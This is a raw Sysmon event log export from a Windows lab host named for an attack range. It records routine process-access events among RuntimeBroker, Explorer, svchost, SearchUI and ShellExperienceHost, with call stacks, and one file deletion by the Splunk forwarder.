12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immer
siveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.813{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.813{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.813{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.813{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.813{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.704{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.704{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.704{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCR
T4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.704{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x800000000000000011115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.407{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B42949E14D603E2996595132A6FCC84C,SHA256=58E155569DD374B34C794BF1EDE53AA88098671EEB8B0AD9A6E1C82D70206A92,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000011159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
